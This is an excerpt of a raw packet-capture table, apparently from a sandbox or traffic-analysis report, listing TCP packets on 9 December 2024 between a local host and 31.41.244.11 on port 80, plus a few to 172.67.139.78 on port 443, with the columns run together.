                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.951942921 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.951976061 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.952688932 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.952699900 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.952727079 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.952759027 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.953526020 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.953572989 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.953587055 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.953632116 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.954377890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.954423904 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.954474926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.954515934 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.955269098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.955324888 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.955338955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.955383062 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.956098080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.956243038 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.956288099 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.956980944 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957034111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957063913 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957228899 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957835913 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957879066 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957954884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.957994938 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.958712101 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.958755016 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.958830118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.959096909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.959594965 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.959641933 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.959655046 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.959779978 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.960454941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.960675955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.960726023 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.961441994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.961602926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.961652994 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.962454081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.962557077 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.962599993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.963063002 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.963100910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.963164091 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.963324070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.964013100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.964107990 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.964148998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.964853048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965017080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965054035 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965661049 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965756893 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965805054 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.965893030 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.966574907 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.966625929 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.966713905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.966763020 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.967427015 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.967477083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.967519045 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.968302965 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.968355894 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.968381882 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.968417883 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.969131947 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.969202042 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.969237089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.970032930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.970101118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.970103979 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.970155001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.970890999 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971008062 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971055031 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971733093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971772909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971847057 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.971892118 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.972624063 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.972770929 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.972810984 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.973510027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.973547935 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.973617077 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.973696947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.974356890 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.974399090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.974421978 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.974436998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.975223064 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.975347996 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.975402117 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976095915 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976140022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976197004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976239920 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976928949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.976969957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977021933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977060080 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977797031 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977859974 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977940083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.977983952 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.978820086 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.978832960 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.978899002 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.979578972 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.979788065 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.979837894 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.980427980 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.980470896 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.980572939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.980617046 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.998014927 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.998059034 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.998142958 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.998514891 CET49884443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.998531103 CET44349884172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.127810955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.127897978 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.127940893 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.127984047 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.127996922 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.128211975 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.128261089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.128523111 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.128570080 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.129132032 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.129143000 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.129180908 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130034924 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130081892 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130194902 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130243063 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130260944 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.130321980 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.131095886 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.131153107 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.131189108 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.131236076 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132082939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132095098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132138014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132879972 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132932901 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132944107 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.132977962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.133680105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.133727074 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.133887053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.133932114 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.134514093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.134562016 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.134660959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.134702921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.135476112 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.135523081 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.135531902 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.135577917 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.136292934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.136337996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.136349916 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.136387110 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.137222052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.137413025 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.137414932 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.137454033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138035059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138078928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138102055 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138144016 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138891935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.138940096 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139009953 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139055014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139833927 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139883041 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139909983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.139955044 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.140677929 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.140723944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.140791893 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.140837908 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.141592979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.141638994 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.141655922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.141700029 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.142386913 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.142436981 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.142501116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.142549038 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.143213987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.143279076 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.143309116 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.143354893 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144236088 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144251108 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144279003 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144290924 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144952059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144963026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.144998074 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.145010948 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.145837069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.145885944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.145906925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.145946026 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.146707058 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.146755934 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.146827936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.146877050 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.147542000 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.147589922 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.147712946 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.147763014 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.148452044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.148503065 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.148564100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.148608923 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.149313927 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.149359941 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.149420023 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.149461031 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.150228024 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.150274992 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.150346041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.150393963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151030064 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151077986 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151082039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151127100 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151901960 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.151949883 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152007103 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152065039 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152861118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152937889 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152964115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.152986050 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.153697014 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.153740883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.153767109 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.153784037 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.154534101 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.154582024 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.154675007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.154721022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.155431986 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.155478954 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.155708075 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.155755997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.156260967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.156308889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.156387091 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.156431913 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157088041 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157135010 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157155991 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157197952 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157949924 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.157994986 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.158077002 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.158124924 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.158993959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159044981 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159080029 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159125090 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159693003 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159742117 CET4987480192.168.2.631.41.244.11
